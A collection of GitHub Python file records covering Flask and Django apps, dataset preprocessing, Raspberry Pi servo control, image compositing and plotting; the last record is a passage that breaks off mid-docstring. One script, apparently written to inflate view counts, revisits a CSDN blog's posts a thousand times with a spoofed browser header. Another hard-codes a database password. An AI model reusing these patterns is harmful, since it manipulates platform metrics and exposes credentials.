+{"seq_id":"21836522107","text":"from flask import Blueprint, flash, render_template, redirect, url_for\r\nfrom flask_wtf import FlaskForm\r\nfrom wtforms import StringField, SubmitField, Label, FileField\r\nfrom wtforms.validators import ValidationError, DataRequired\r\nfrom flask_login import login_required, current_user\r\nfrom flask_login import current_user\r\nfrom flask_sqlalchemy import SQLAlchemy\r\nfrom models import User\r\nimport base64\r\n\r\ndb = SQLAlchemy()\r\n\r\nprofile_blueprint = Blueprint(\"profile_bp\", __name__)\r\n\r\ndef validate_id(form, field):\r\n if len(field.data) != 14:\r\n raise ValidationError(\"The ID to add a friend must be a 14 characters long ID!\")\r\n\r\n friend = db.session.query(User).filter_by(id_for_friendship=field.data).first()\r\n\r\n if friend is None:\r\n raise ValidationError(\"This ID does not correspond to any user, check again or ask your friend to send it back\")\r\n \r\n if friend.id == current_user.id:\r\n raise ValidationError(\"You can't add yourself as a friend\")\r\n\r\nclass AddFriend(FlaskForm):\r\n id_for_friendship = StringField(\"Id for friendship\", validators=[DataRequired(), validate_id])\r\n submit = SubmitField(\"Search\")\r\n\r\nclass ChangeProfilePictureForm(FlaskForm):\r\n change_propic = Label(field_id=\"image\", text=\"\")\r\n image = FileField(\"Image file\")\r\n \r\n\r\n@profile_blueprint.route('/profile', methods=['GET', 'POST'])\r\n@login_required\r\ndef profile():\r\n\r\n my_friends = list(User.query.filter_by(id=current_user.id).first().friends)\r\n\r\n change_profile_picture_form = ChangeProfilePictureForm()\r\n add_friend_form = AddFriend()\r\n\r\n if change_profile_picture_form.image.data and change_profile_picture_form.validate_on_submit():\r\n change_profile_picture(change_profile_picture_form)\r\n\r\n if add_friend_form.submit.data and add_friend_form.validate_on_submit():\r\n add_friend(add_friend_form)\r\n\r\n return render_template('profile.html', user=current_user, friends=my_friends, add_friend_form=add_friend_form, change_form=change_profile_picture_form)\r\n\r\ndef change_profile_picture(form):\r\n file = form.image.data\r\n new_profile_picture = file.read()\r\n new_rendered_profile_picture = base64.b64encode(new_profile_picture).decode('ascii')\r\n\r\n user = db.session.query(User).filter_by(id=current_user.id).first()\r\n\r\n user.rendered_profile_picture = new_rendered_profile_picture\r\n user.profile_picture = new_profile_picture\r\n\r\n db.session.commit()\r\n return redirect(url_for('profile_bp.profile'))\r\n\r\ndef add_friend(form):\r\n\r\n id_for_friendship = form.id_for_friendship.data\r\n\r\n friend = db.session.query(User).filter_by(id_for_friendship=id_for_friendship).first()\r\n\r\n myself = db.session.query(User).filter_by(id=current_user.id).first()\r\n \r\n if friend in myself.friends:\r\n flash(friend.name + \" \" + friend.surname + \" is already your friend\", \"warning\")\r\n return redirect(url_for('profile_bp.profile'))\r\n\r\n myself.friends.append(friend)\r\n friend.friends.append(myself)\r\n\r\n db.session.commit()\r\n \r\n \r\n flash(friend.name + \" \" + friend.surname + \" has been added to your friends\", \"message\")\r\n return redirect(url_for('profile_bp.profile'))","repo_name":"MaxDaGiau/IS-PoliCook","sub_path":"PoliCook/blueprints/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":3170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"7517281054","text":"import requests\r\nfrom lxml import html\r\nimport re\r\nimport time\r\nimport random\r\n\r\n\r\nclass csdnCrawler:\r\n def __init__(self):\r\n self.headers = {\r\n 'Accept-Encoding': 'gzip, deflate, br',\r\n 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',\r\n 'Upgrade-Insecure-Requests': '1',\r\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',\r\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\r\n 'Cache-Control': 'max-age=0',\r\n #'Connection': 'keep-alive',\r\n 'Connection': 'close'\r\n }\r\n \r\n def click(self):\r\n url = 'https://blog.csdn.net/'+'你的csdn用户名'\r\n resp = requests.get(url,headers=self.headers)\r\n #print(str(resp.content,'utf8'))\r\n resultList = self.parse(resp)\r\n for url in resultList:\r\n self.visit(url)\r\n\r\n def parse(self,resp): #博客列表\r\n selector = html.fromstring(resp.content)\r\n return selector.xpath('//p[@class=\"content\"]/a/@href')\r\n \r\n def visit(self,url):\r\n try:\r\n print('访问: ',url)\r\n resp = requests.get(url,headers=self.headers)\r\n selector = html.fromstring(resp.content)\r\n \r\n except Exception as e:\r\n print(e)\r\n \r\n\r\n\r\nif(__name__=='__main__'):\r\n csdn = csdnCrawler()\r\n times = 0\r\n while(times < 1000):\r\n csdn.click()\r\n times = times+1\r\n print(times)\r\n time.sleep(60+random.random()*5)\r\n","repo_name":"githubxiaowei/crawler","sub_path":"csdnCrawler.py","file_name":"csdnCrawler.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"20092985235","text":"import pickle, time, glob, argparse\nimport torch\nimport numpy as np\nfrom PIL import Image\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--datadir', type=str, default='Data/DeepFashion/Category and Attribute Prediction Benchmark')\nparser.add_argument('--humanlabels_to_onehot', type=str, default='DeepFashion/humanlabels_to_onehot.pkl')\nparser.add_argument('--labels_val', type=str, default='DeepFashion/labels_val.pkl')\nparser.add_argument('--labels_train', type=str, default='DeepFashion/labels_train.pkl')\nparser.add_argument('--labels_test', type=str, default='DeepFashion/labels_test.pkl')\nparser.add_argument('--biased_classes', type=str, default='DeepFashion/biased_classes.pkl')\nparser.add_argument('--biased_classes_mapped', type=str, default='DeepFashion/biased_classes_mapped.pkl')\narg = vars(parser.parse_args())\nprint('\\n', arg, '\\n')\n\n\n# Load labels\nattributes_txt = open('{}/Anno_coarse/list_attr_cloth.txt'.format(arg['datadir']))\nattributes_txt = attributes_txt.read().split('\\n')\nattributes_txt = attributes_txt[2:-1] # first two lines contain headers and number of attrs, last line is empty\n\n# Create a dictionary that maps human-readable labels to [0-1000], but don't save because we only need the top 250\nhumanlabels = []\nhumanlabels_to_onehot = {}\nfor i in range(1000):\n humanlabel = ''.join(i for i in attributes_txt[i] if not i.isdigit()).rstrip()\n humanlabels.append(humanlabel)\n humanlabels_to_onehot[humanlabel] = i\n\n# Create a dictionary mapping filenames to labels\nlist_attr_img = open('{}/Anno_coarse/list_attr_img.txt'.format(arg['datadir']))\nlist_attr_img = list_attr_img.read().split('\\n')\nlist_attr_img = list_attr_img[2:-1] # first two lines contain headers and number of images, last line is empty\n\nprint('Mapping filenames to labels')\nstart_time = time.time()\nimg_to_label = {}\nfor count,anno in enumerate(list_attr_img):\n anno = anno.split()\n img = anno[0]\n img = '{}/Img/img/{}'.format(arg['datadir'], img)\n label = [int(i) for i in anno[1:]]\n label = [(i + 1) // 2 for i in label]\n label = torch.LongTensor(label).float()\n img_to_label[img] = label\n\n if count%1000 == 0:\n print(count, time.time()-start_time)\nprint('Done')\n\n# Create a list of train, val, test, image file names\neval_split_txt = open('{}/Eval/list_eval_partition.txt'.format(arg['datadir']))\neval_split_txt = eval_split_txt.read().split('\\n')\neval_split_txt = eval_split_txt[2:-1]\nval = []\ntrain = []\ntest = []\nfor line in eval_split_txt:\n filename, split = line.split()\n filename = '{}/Img/img/{}'.format(arg['datadir'], filename)\n if split == 'train':\n train.append(filename)\n elif split == 'val':\n val.append(filename)\n elif split == 'test':\n test.append(filename)\n else:\n print('Unknown split: {}'.format(filename))\nprint('train {}, val {}, test {}\\n'.format(len(train), len(val), len(test)))\n\n# Get top 250 categories in train set\nattr_count = torch.zeros(1000)\nfor file in train:\n attr_count += img_to_label[file]\nsorted_attr = torch.argsort(attr_count)\n\ntop_250 = [] # store onehot indices of top 250 labels for easy access\nfor i in range(250):\n onehot = sorted_attr[-(i+1)]\n top_250.append(int(onehot))\ntop_250.sort() # make sure indices are in increasing order\n\nhumanlabels_to_onehot = {}\nfor i in range(250):\n onehot = top_250[i]\n humanlabel = humanlabels[onehot]\n humanlabels_to_onehot[humanlabel] = i\n\n# Save top 250 most common labels in train set\nwith open(arg['humanlabels_to_onehot'], 'wb+') as handle:\n pickle.dump(humanlabels_to_onehot, handle)\nprint('Saved top 250 train labels in humanlabels_to_onehot.pkl')\n\n# Process DeepFashion validation set labels\nif True:\n count = 0\n labels = {}\n for file in val:\n label_onehot_1000 = img_to_label[file]\n label_onehot_250 = label_onehot_1000[top_250]\n labels[file] = label_onehot_250 # Save the one-hot encoded label\n count += 1\n\n print('Finished processing {} val labels'.format(len(labels)))\n with open(arg['labels_val'], 'wb+') as handle:\n pickle.dump(labels, handle)\n\n# Process DeepFashion train set labels\nif True:\n count = 0\n labels = {}\n for file in train:\n label_onehot_1000 = img_to_label[file]\n label_onehot_250 = label_onehot_1000[top_250]\n labels[file] = label_onehot_250 # Save the one-hot encoded label\n count += 1\n\n print('Finished processing {} train labels'.format(len(labels)))\n with open(arg['labels_train'], 'wb+') as handle:\n pickle.dump(labels, handle)\n\n# Process DeepFashion test set labels\nif True:\n count = 0\n labels = {}\n for file in test:\n label_onehot_1000 = img_to_label[file]\n label_onehot_250 = label_onehot_1000[top_250]\n labels[file] = label_onehot_250 # Save the one-hot encoded label\n count += 1\n\n print('Finished processing {} test labels'.format(len(labels)))\n with open(arg['labels_test'], 'wb+') as handle:\n pickle.dump(labels, handle)\n\n# 20 most biased classes identified in the original paper\nbiased_classes = {}\nbiased_classes['bell'] = 'lace'\nbiased_classes['cut'] = 'bodycon'\nbiased_classes['animal'] = 'print'\nbiased_classes['flare'] = 'fit'\nbiased_classes['embroidery'] = 'crochet'\nbiased_classes['suede'] = 'fringe'\nbiased_classes['jacquard'] = 'flare'\nbiased_classes['trapeze'] = 'striped'\nbiased_classes['neckline'] = 'sweetheart'\nbiased_classes['retro'] = 'chiffon'\nbiased_classes['sweet'] = 'crochet'\nbiased_classes['batwing'] = 'loose'\nbiased_classes['tassel'] = 'chiffon'\nbiased_classes['boyfriend'] = 'distressed'\nbiased_classes['light'] = 'skinny'\nbiased_classes['ankle'] = 'skinny'\nbiased_classes['french'] = 'terry'\nbiased_classes['dark'] = 'wash'\nbiased_classes['medium'] = 'wash'\nbiased_classes['studded'] = 'denim'\nwith open(arg['biased_classes'], 'wb+') as handle:\n pickle.dump(biased_classes, handle)\n\nbiased_classes_mapped = dict((humanlabels_to_onehot[key], humanlabels_to_onehot[value]) for (key, value) in biased_classes.items())\nwith open(arg['biased_classes_mapped'], 'wb+') as handle:\n pickle.dump(biased_classes_mapped, handle)\n","repo_name":"princetonvisualai/ContextualBias","sub_path":"DeepFashion/data_process.py","file_name":"data_process.py","file_ext":"py","file_size_in_byte":6136,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"3"}
+{"seq_id":"25874685712","text":"from flask import Flask, jsonify, request\r\nfrom flask_socketio import SocketIO\r\nfrom flask_cors import CORS\r\nfrom DP1Database import Database\r\nimport RPi.GPIO as GPIO\r\nimport time\r\nimport ldr\r\nimport vochtig\r\nimport beweging\r\nimport pigpio\r\nfrom PCF8574A import LCDScreen\r\nlcd = LCDScreen(False, 21, 20, 22, 5, 6, 27, 17, 25, 12, 16) # init van lcd\r\nlcd.LCD_init() # init van LCD (2\r\n\r\napp = Flask(__name__)\r\nCORS(app)\r\nsocketio = SocketIO(app)\r\nconn = Database(app=app, user='ruben', password='rubenroose', db='project1')\r\nvochtigheid = vochtig.Vochtig(conn)\r\n\r\n\r\n\r\n\r\n@socketio.on('getTemp')\r\ndef temp():\r\n temp = conn.get_data(\"SELECT Value FROM project1.Historiek WHERE project1.Historiek.Sensor_SensorID = 2 ORDER BY project1.Historiek.HistoriekID DESC LIMIT 1;\")\r\n socketio.emit('giveTemp', str(temp[0]['Value']))\r\n\r\n@socketio.on('getVocht')\r\ndef temp():\r\n vocht = conn.get_data(\"SELECT Value FROM project1.Historiek WHERE project1.Historiek.Sensor_SensorID = 1 ORDER BY project1.Historiek.HistoriekID DESC LIMIT 1;\")\r\n socketio.emit('giveVocht', str(vocht[0]['Value']))\r\n\r\n@socketio.on('getGraad')\r\ndef graad():\r\n graad = conn.get_data(\"SELECT Value FROM project1.Historiek WHERE project1.Historiek.Sensor_SensorID = 2 ORDER BY project1.Historiek.HistoriekID DESC LIMIT 1;\")\r\n socketio.emit('giveGraad', str(graad[0]['Value']))\r\n\r\n@socketio.on('getProcent')\r\ndef temp():\r\n procent = conn.get_data(\"SELECT Value FROM project1.Historiek WHERE project1.Historiek.Sensor_SensorID = 2 ORDER BY project1.Historiek.HistoriekID DESC LIMIT 1;\")\r\n socketio.emit('giveProcent', str(procent[0]['Value']))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nlopen = beweging.Beweging(conn)\r\nlicht = ldr.Licht(conn)\r\n\r\n\r\nlcd.send_line('Smartroom')\r\nlcd.second_row()\r\nlcd.statusip1()\r\n\r\n\r\nservopin = 26\r\nservoPIN = 18\r\n\r\npiGPIO = pigpio.pi()\r\npiGPIO.set_PWM_frequency(servoPIN, 50)\r\npiGPIO.set_PWM_dutycycle(servoPIN, (14/100)*255)\r\n\r\n\r\n@socketio.on('knop')\r\ndef openGordijn():\r\n piGPIO.set_PWM_dutycycle(servoPIN, (7.5 / 100) * 255)\r\n time.sleep(30)\r\n\r\npiGPIO.set_PWM_frequency(servopin, 50)\r\npiGPIO.set_PWM_dutycycle(servopin, (14/100)*255)\r\n\r\n@socketio.on('button')\r\ndef openDeur():\r\n piGPIO.set_PWM_dutycycle(servopin, (7.5 / 100) * 255)\r\n time.sleep(30)\r\n#\r\n#\r\n# @socketio.on('button2')\r\n# def geklikt():\r\n# h.ChangeDutyCycle(7.5)\r\n# time.sleep(5)\r\n# h.ChangeDutyCycle(2.5)\r\n# time.sleep(1)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n socketio.run(app, debug=False, host=\"0.0.0.0\", port=5000)","repo_name":"Rubenroose/smartroom","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"14842578673","text":"from PIL import Image\n\nclass ImageService:\n template_path = \"Figma_Version.png\"\n template = Image.open(template_path).convert('RGBA')\n template_width, template_height = template.size\n\n @classmethod\n def handle_image_upload(cls, file_path):\n # Open the uploaded image\n try:\n uploaded_image = Image.open(file_path).convert('RGBA')\n except Exception as e:\n print(f\"Error: Unable to open the uploaded image: {e}\")\n return\n\n uploaded_width, uploaded_height = uploaded_image.size\n\n # Define the fixed dimensions back to their original values\n fixed_width = 5000\n fixed_height = 3350\n\n # Scale the uploaded image to fit the fixed dimensions\n scaled_image = uploaded_image.resize((fixed_width, fixed_height), Image.LANCZOS)\n\n # Manually adjust the position of the scaled image\n x = 550 # Adjust the value based on your desired position from the left edge\n y = 80 # Adjust the value based on your desired position from the top edge\n\n # Create a new transparent image with the template's size\n combined_image = Image.new('RGBA', (cls.template_width, cls.template_height), (0, 0, 0, 0))\n\n # Paste the scaled image onto the transparent image with the mask\n combined_image.paste(scaled_image, (x, y))\n\n # Combine the scaled image with the template using the alpha channel\n cls.template = Image.alpha_composite(cls.template, combined_image)\n\n @classmethod\n def save_resulting_image(cls, output_path):\n # Save the resulting image with higher quality\n cls.template.save(output_path)\n\nif __name__ == \"__main__\":\n # Replace with the actual file paths for the uploaded image and output image\n uploaded_image_path = \"20230729330.JPG\"\n output_path = \"output.png\"\n\n # Perform image upload, scaling, and embedding on the template\n ImageService.handle_image_upload(uploaded_image_path)\n\n # Save the resulting image\n ImageService.save_resulting_image(output_path)\n\n print(\"Image processing complete. Result saved as 'output.png'.\")\n\n\n# import os\n# import boto3\n# from PIL import Image\n\n# s3 = boto3.client('s3')\n\n# class ImageService:\n# template_path = \"Figma_Version.png\"\n# template = Image.open(template_path).convert('RGBA')\n# template_width, template_height = template.size\n\n# @classmethod\n# def handle_image_upload(cls, file_path):\n# try:\n# uploaded_image = Image.open(file_path).convert('RGBA')\n# except Exception as e:\n# print(f\"Error: Unable to open the uploaded image: {e}\")\n# return\n\n# uploaded_width, uploaded_height = uploaded_image.size\n\n# fixed_width = 5000\n# fixed_height = 3350\n# scaled_image = uploaded_image.resize((fixed_width, fixed_height), Image.LANCZOS)\n\n# x = 550\n# y = 80\n\n# combined_image = Image.new('RGBA', (cls.template_width, cls.template_height), (0, 0, 0, 0))\n# combined_image.paste(scaled_image, (x, y))\n# cls.template = Image.alpha_composite(cls.template, combined_image)\n\n# @classmethod\n# def save_resulting_image(cls, output_path):\n# cls.template.save(output_path)\n\n# def lambda_handler(event, context):\n# uploaded_image_key = \"20230729330.JPG\"\n# output_key = \"output.png\"\n\n# temp_local_path = '/tmp/' + uploaded_image_key\n# output_local_path = '/tmp/' + output_key\n\n# s3.download_file('your-s3-bucket-name', uploaded_image_key, temp_local_path)\n\n# ImageService.handle_image_upload(temp_local_path)\n# ImageService.save_resulting_image(output_local_path)\n\n# s3.upload_file(output_local_path, 'your-s3-bucket-name', output_key)\n\n# return \"Image processing complete. Result saved as 'output.png'.\"\n","repo_name":"egg-lou/TemplatePhoto","sub_path":"template_script.py","file_name":"template_script.py","file_ext":"py","file_size_in_byte":3822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"20305151004","text":"from __future__ import division\n\ntry:\n import Tkinter as tkinter\nexcept ImportError:\n import tkinter\n\nfrom .control_objects import Label\n\n\nclass KeyMap(object):\n def __init__(self):\n # JavaScript keycode translations\n self._tr = {'up': 38, 'down': 40, 'left': 37, 'right': 39,\n 'space': 32, 'return': 13, 'tab': 9, 'backspace': 8,\n 'comma': 188, 'minus': 189, 'period': 190, 'slash': 191}\n nums = dict(zip([chr(x) for x in range(ord('0'), ord('9') + 1)],\n range(48, 58)))\n self._tr.update(nums)\n alphas = dict(zip([chr(x) for x in range(ord('a'), ord('z') + 1)],\n range(65, 91)))\n self._tr.update(alphas)\n fxs = dict(zip(['f%d' % x for x in range(1, 13)], range(112, 124)))\n self._tr.update(fxs)\n\n def __getitem__(self, name):\n # Attempt to map key to keycode, otherwise just return the name so it\n # can be matched by KEY_MAP[name].\n return self._tr.get(name.lower(), name.lower())\n\n\nKEY_MAP = KeyMap()\n\n\nclass InputAdapter(object):\n def _status_frame_init(self, status_frame):\n key_frame = tkinter.LabelFrame(status_frame, text='Key')\n self._key_label = Label(key_frame, '')\n\n mouse_frame = tkinter.LabelFrame(status_frame, text='Mouse')\n self._mouse_label = Label(mouse_frame, '')\n\n key_frame.pack(fill=tkinter.BOTH)\n mouse_frame.pack(fill=tkinter.BOTH)\n\n def __init__(self, status_frame, key_master, mouse_master):\n self._key_label = None\n self._mouse_label = None\n self._status_frame_init(status_frame)\n\n self._key_after_id = None\n self._keydown_handler = None\n self._keyup_handler = None\n self._key_master = key_master\n key_master.bind('', self._keydown)\n key_master.bind('', self._keyup)\n\n self._mouse_click_handler = None\n self._mouse_drag_handler = None\n mouse_master.bind('', self._mouse_click)\n mouse_master.bind('', self._mouse_drag)\n\n def _keydown(self, key):\n if self._keydown_handler is not None:\n if self._key_after_id is not None:\n self._key_master.after_cancel(self._key_after_id)\n self._key_after_id = None\n else:\n self._key_label.set_text('Down %s' % key.keysym)\n self._keydown_handler(KEY_MAP[key.keysym])\n\n def _keyup_no_bounce(self, key):\n if self._keyup_handler is not None:\n self._key_label.set_text('Up %s' % key.keysym)\n self._keyup_handler(KEY_MAP[key.keysym])\n self._key_after_id = None\n\n def _keyup(self, key):\n after_id = self._key_master.after_idle(self._keyup_no_bounce, key)\n self._key_after_id = after_id\n\n def _mouse_click(self, event):\n if self._mouse_click_handler is not None:\n pos = (event.x, event.y)\n self._mouse_label.set_text('Click %d, %d' % (pos[0], pos[1]))\n self._mouse_click_handler(pos)\n\n def _mouse_drag(self, event):\n if self._mouse_drag_handler is not None:\n pos = (event.x, event.y)\n self._mouse_label.set_text('Move %d, %d' % (pos[0], pos[1]))\n self._mouse_drag_handler((event.x, event.y))\n\n def set_keydown_handler(self, key_handler):\n self._keydown_handler = key_handler\n\n def set_keyup_handler(self, key_handler):\n self._keyup_handler = key_handler\n\n def set_mouseclick_handler(self, mouse_handler):\n self._mouse_click_handler = mouse_handler\n\n def set_mousedrag_handler(self, mouse_handler):\n self._mouse_drag_handler = mouse_handler\n","repo_name":"dholm/simpleguitk","sub_path":"simpleguitk/input.py","file_name":"input.py","file_ext":"py","file_size_in_byte":3724,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"3"}
+{"seq_id":"7648708912","text":"\"\"\"Plot grafa krivulje drugog reda, te analiza o kojoj se krivulji radi isprintano na prikazu\"\"\"\r\nimport pandas as pd\r\nfrom matplotlib import pyplot as plt\r\nimport numpy as np\r\nfrom PIL import ImageTk,Image\r\nfrom tkinter import *\r\n\r\nroot = Tk()\r\nbackground = \"#DDE0A9\"\r\nentry_background = \"#F1F1F1\"\r\nroot.title(\"Graf krivulje drugog reda\")\r\nroot.geometry(\"1280x720+1+1\")\r\nroot.configure(background=background)\r\ndef quit():\r\n root.quit()\r\n root.destroy()\r\ndef plot_graph():\r\n A = A_entry.get()\r\n C = C_entry.get()\r\n D = D_entry.get()\r\n E = E_entry.get()\r\n F = F_entry.get()\r\n\r\n if A != '' and C !='' and D != '' and E != '' and F != '':\r\n A = int(A)\r\n C = int(C)\r\n D = int(D)\r\n F = int(F)\r\n E = int(E)\r\n if (A == 0 or C == 0):\r\n object_type = \"Parabola\"\r\n elif (A == C):\r\n object_type = \"Kruznica\"\r\n elif (A * C < 0):\r\n object_type = \"Hiperbola\"\r\n elif (A * C > 0):\r\n object_type = \"Elipsa\"\r\n\r\n x = np.linspace(-10, 10, 500)\r\n y = np.linspace(-10, 10, 500)\r\n X, Y = np.meshgrid(x, y)\r\n\r\n G = A*X*X + C*Y*Y + D*X + E*Y + F\r\n fig,ax = plt.subplots()\r\n ax.contour(X, Y, G, levels=[15], colors='red') # take level set corresponding to 0\r\n ax.spines['left'].set_position('zero')\r\n ax.spines['right'].set_color('none')\r\n ax.spines['bottom'].set_position('zero')\r\n ax.spines['top'].set_color('none')\r\n plt.title(str(object_type))\r\n plt.grid()\r\n plt.show()\r\n return\r\n\r\nfunc_label = Label(root, text='F(x,y)=Ax^2 + Cy^2 + Dx + Ey + F', font=('Helvetica', 15), bg=background)\r\nfunc_label.place(x=10, y=50, width=350, height=25)\r\nA_label = Label(root, text='A',bg=background).place(x=60, y=150, width=10, height=25)\r\nA_entry = Entry(root, bg=entry_background)\r\nA_entry.place(x=75, y=150, width=100, height=25)\r\nC_label = Label(root, text='C',bg=background).place(x=60, y=180, width=10, height=25)\r\nC_entry = Entry(root, bg=entry_background)\r\nC_entry.place(x=75, y=180, width=100, height=25)\r\nD_label = Label(root, text='D',bg=background).place(x=60, y=210, width=10, height=25)\r\nD_entry = Entry(root, bg=entry_background)\r\nD_entry.place(x=75, y=210, width=100, height=25)\r\nE_label = Label(root, text='E',bg=background).place(x=60, y=240, width=10, height=25)\r\nE_entry = Entry(root, bg=entry_background)\r\nE_entry.place(x=75, y=240, width=100, height=25)\r\nF_label = Label(root, text='F',bg=background).place(x=60, y=270, width=10, height=25)\r\nF_entry = Entry(root, bg=entry_background)\r\nF_entry.place(x=75, y=270, width=100, height=25)\r\ngraph_button = Button(root, command=plot_graph, text='graph', font=('Helvetica', 12), bg='#58E56B').place(x=60, y=330, width=120, height=45)\r\ngraph_quit = Button(root, command=quit, text='quit', font=('Helvetica', 12), bg='#EE452A').place(x=60, y=400, width=120, height=45)\r\nroot.mainloop()\r\n","repo_name":"MarkoBosnjak1/Small-codes","sub_path":"mat.py","file_name":"mat.py","file_ext":"py","file_size_in_byte":2940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"70048145682","text":"from django.shortcuts import render\nfrom django.contrib.auth.decorators import login_required\nfrom shop.models import Order\n\n\n\n@login_required\ndef profile(request):\n order_list = request.user.order_set.all()\n sum_amount = 0\n confirmed_order_list = []\n for order in order_list:\n order.update()\n if order.status == 'paid':\n confirmed_order_list.append(order)\n sum_amount += order.amount\n # order_list = Order.objects.filter(user=request.user)\n return render(request, 'accounts/profile.html', {\n 'order_list': confirmed_order_list,\n 'sum_amount': sum_amount,\n })\n","repo_name":"countmonte7/sssg","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"73805813202","text":"import os\nimport argparse\nimport json\nimport time\nimport cv2\nfrom wand.image import Image\nfrom google.cloud import storage\nfrom google.cloud import pubsub_v1\n\ndef poll_notifications(project, subscription_name):\n \"\"\"Polls a Cloud Pub/Sub subscription for new GCS events for display.\"\"\"\n # [BEGIN poll_notifications]\n subscriber = pubsub_v1.SubscriberClient()\n subscription_path = subscriber.subscription_path(\n project, subscription_name\n )\n\n def callback(message):\n #show_image(message.attributes['objectId'])\n #print(\"Received message:\\n{}\".format(summarize(message)))\n data = message.data.decode(\"utf-8\")\n attributes = message.attributes\n\n event_type = attributes[\"eventType\"]\n bucket_id = attributes[\"bucketId\"]\n object_id = attributes[\"objectId\"]\n print(object_id)\n message.ack()\n var = \"Message not important\"\n if \"data\" in object_id:\n storage_client = storage.Client.from_service_account_json('service_account.json')\n # get bucket with name\n bucket = storage_client.get_bucket('processed_artworks')\n # get bucket data as blob\n blob = bucket.get_blob(object_id)\n # convert to stringfil\n json_data = blob.download_as_string()\n # open file in writing\n text_file = open(object_id, \"wb\")\n # write on file and close\n n = text_file.write(json_data)\n text_file.close()\n # image to process\n image_to_get = object_id[:-4].split(\"_\")[-1]\n with Image(filename=image_to_get) as left:\n print('width_1 =', left.width)\n print('height_1 =', left.height)\n # data image\n with Image(filename=object_id) as img2:\n print('width_2 =', img2.width)\n print('height_2 =', img2.height)\n if left.width != img2.width or left.height != img2.height:\n img2.resize(left.width, left.height)\n img2.save(filename=\"resized.png\") \n with Image(filename=\"resized.png\") as affinity:\n left.remap(affinity)\n else:\n left.remap(img2)\n left.save(filename=\"image_displayed.jpg\")\n # display the image\n print(\"Showing image:{}\".format(image_to_get))\n img2 = cv2.imread('./image_displayed.jpg')\n cv2.imshow(\"image\", img2)\n var = \"Image correctly showed\"\n print(\"Result of callback:{}\".format(var))\n \n\n subscriber.subscribe(subscription_path, callback=callback)\n # The subscriber is non-blocking, so we must keep the main thread from\n # exiting to allow it to process messages in the background.\n print(\"Listening for messages on {}\".format(subscription_path))\n img = cv2.imread('./{}'.format(\"cristo.jpg\"))\n cv2.namedWindow(\"image\", cv2.WINDOW_NORMAL)\n # for the full screen mode\n #cv2.setWindowProperty(\"image\", cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)\n while True:\n cv2.waitKey(0)\n \n #time.sleep(60)\n # [END poll_notifications]\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description=__doc__,\n formatter_class=argparse.RawDescriptionHelpFormatter,\n )\n parser.add_argument(\n \"project\", help=\"The ID of the project that owns the subscription\"\n )\n parser.add_argument(\n \"subscription\", help=\"The ID of the Pub/Sub subscription\"\n )\n args = parser.parse_args()\n poll_notifications(args.project, args.subscription)\n","repo_name":"fcolasante/dynARTwork","sub_path":"devices/actuators/notification_polling.py","file_name":"notification_polling.py","file_ext":"py","file_size_in_byte":3707,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"72523448720","text":"\"\"\"排名模块\"\"\"\nimport threading\nimport time\n\nimport pymongo\nimport schedule\n\n# mongodb host\nhost = \"localhost\"\n\nvj = pymongo.MongoClient(host=host, port=27017)['vj']\n\n\ndef match_info(start, num):\n \"\"\"\n 获得每个用户的total_sub, total_ac,total_wa,last_submit_time(保证兼容)\n :param start: 开始处理的id号\n :param num: 每次处理的个数\n :return: None\n \"\"\"\n users = vj['user'].find().skip(start).limit(num)\n cnt = 1\n for user in users:\n username = user['username']\n try:\n total_sub = vj['submission'].count({'username': username})\n\n total_ac_submit = vj['submission'].find({'username': username, 'result': 'Accepted'})\n total_ac_submit_set = set()\n for ac_submit in total_ac_submit:\n total_ac_submit_set.add(\"{} {}\".format(ac_submit['soj'], str(ac_submit['sid'])))\n total_ac = len(total_ac_submit_set)\n\n total_wa = vj['submission'].find({'username': username, 'result': 'Wrong Answer'}).count()\n\n try:\n last_submit_time = vj['submission'].find_one({'username': username}, sort=[('submittime', -1)])[\n 'submittime']\n except:\n total_sub = 0\n total_ac = 0\n total_wa = 0\n last_submit_time = None\n print(\"{} {} {} {} {} {}/{}\".format(username, total_sub, total_ac, total_wa, last_submit_time, cnt, num))\n\n cnt += 1\n vj['user'].find_and_modify(\n {'username': username},\n {'$set': {\n 'total_sub': total_sub,\n 'total_ac': total_ac,\n 'total_wa': total_wa,\n 'last_submit_time': last_submit_time\n }})\n\n except Exception as e:\n print('{}\\n{}'.format(username, e))\n\n\ndef match_info_multithreading():\n \"\"\"\n 多线程匹配信息\n :return:\n \"\"\"\n start = 0\n num = 100\n total = vj['user'].count()\n thread_pool = []\n while start < total:\n th = threading.Thread(target=match_info, args=(start, num))\n thread_pool.append(th)\n start += num\n\n for th in thread_pool:\n th.start()\n\n for th in thread_pool:\n th.join()\n\n\ndef rank():\n \"\"\"\n 排序,按照total_ac 降序,last_submit_time 降序(保证唯一)\n 注意:需要数据库建立索引 